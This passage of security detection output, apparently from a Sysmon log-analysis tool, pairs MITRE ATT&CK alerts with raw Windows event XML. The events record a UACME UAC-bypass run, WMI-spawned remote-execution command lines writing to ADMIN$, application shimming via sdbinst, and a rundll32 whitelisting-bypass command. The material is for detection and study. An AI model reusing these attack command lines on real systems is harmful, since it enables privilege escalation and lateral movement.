<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-A685-5D46-0000-00109B2AD703</Data>
<Data Name=""ParentProcessId"">3916</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Desktop\UACME.exe</Data>
<Data Name=""ParentCommandLine"">UACME.exe 55 c:\Windows\SysWOW64\notepad.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1618950781.944467,2021-04-21T00:33:01.944467+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-04-20T20:33:01.944115Z"">
</TimeCreated>
<EventRecordID>578500</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3392"" ThreadID=""4248"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2021-04-20 20:33:59.834</Data>
<Data Name=""ProcessGuid"">747F3D96-04C3-607F-0000-0010F13B1E00</Data>
<Data Name=""ProcessId"">2532</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">127.0.0.1</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10</Data>
<Data Name=""SourcePort"">49925</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">127.0.0.1</Data>
<Data Name=""DestinationHostname"">MSEDGEWIN10</Data>
<Data Name=""DestinationPort"">445</Data>
<Data Name=""DestinationPortName"">microsoft-ds</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.168589Z"">
</TimeCreated>
<EventRecordID>9826</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.168</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-00105F321D00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.168589Z"">
</TimeCreated>
<EventRecordID>9826</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.168</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-00105F321D00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.168589Z"">
</TimeCreated>
<EventRecordID>9826</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.168</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-00105F321D00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028584.802196,2019-03-20T00:49:44.802196+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:49:44.792182Z"">
</TimeCreated>
<EventRecordID>1966408</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:49:44.712</Data>
<Data Name=""ProcessGuid"">365ABB72-55E8-5C91-0000-001037DF0700</Data>
<Data Name=""ProcessId"">4052</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
Command run remotely Using WMI,1607599134.733908,2020-12-10T15:18:54.733908+04:00,,Threat,Critical,User (NT AUTHORITY\LOCAL SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-12-10T11:18:54.600413Z"">
</TimeCreated>
<EventRecordID>549600</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3556"" ThreadID=""4972"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-12-10 11:18:54.576</Data>
<Data Name=""ProcessGuid"">747F3D96-041E-5FD2-0000-001024DF3B00</Data>
<Data Name=""ProcessId"">5580</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">WMI Provider Host</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Wmiprvse.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\LOCAL SERVICE</Data>
<Data Name=""LogonGuid"">747F3D96-7E79-5FD2-0000-0020E5030000</Data>
<Data Name=""LogonId"">0x3e5</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">832</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1618950781.944115,2021-04-21T00:33:01.944115+04:00,,Threat,Low,Found User (MSEDGEWIN10\user03) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-04-20T20:33:00.384036Z"">
</TimeCreated>
<EventRecordID>578499</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3392"" ThreadID=""4112"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-04-20 20:33:00.318</Data>
<Data Name=""ProcessGuid"">747F3D96-3A7C-607F-0000-001058067700</Data>
<Data Name=""ProcessId"">2740</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\user03</Data>
<Data Name=""LogonGuid"">747F3D96-3A7C-607F-0000-002075057700</Data>
<Data Name=""LogonId"">0x770575</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-3A77-607F-0000-00105DD17600</Data>
<Data Name=""ParentProcessId"">7280</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -Version 5.1 -s -NoLogo -NoProfile</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1579034691.122589,2020-01-15T00:44:51.122589+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;cmd.exe&quot; /c notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:44:51.016110Z"">
</TimeCreated>
<EventRecordID>337</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:44:50.978</Data>
<Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-0010745E7A00</Data>
<Data Name=""ProcessId"">1568</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;cmd.exe&quot; /c notepad.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
<Data Name=""LogonId"">0x7a3aff</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
<Data Name=""ParentProcessId"">4180</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656513.168589,2019-05-01T00:35:13.168589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:35:12.449839Z"">
</TimeCreated>
<EventRecordID>9833</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:35:12.340</Data>
<Data Name=""ProcessGuid"">365ABB72-B180-5CC8-0000-00102BB71E00</Data>
<Data Name=""ProcessId"">1504</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B17F-5CC8-0000-0020C6A31E00</Data>
<Data Name=""LogonId"">0x1ea3c6</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B17F-5CC8-0000-001082A51E00</Data>
<Data Name=""ParentProcessId"">3572</Data>
<Data Name=""ParentImage"">C:\Windows\System32\mmc.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\mmc.exe -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,FileProtocolHandler ms-browser://)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:44:50.353148Z"">
</TimeCreated>
<EventRecordID>336</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:44:50.348</Data>
<Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
<Data Name=""ProcessId"">4180</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
<Data Name=""LogonId"">0x7a3aff</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-0010903C7A00</Data>
<Data Name=""ParentProcessId"">1628</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:44:50.353148Z"">
</TimeCreated>
<EventRecordID>336</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:44:50.348</Data>
<Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
<Data Name=""ProcessId"">4180</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
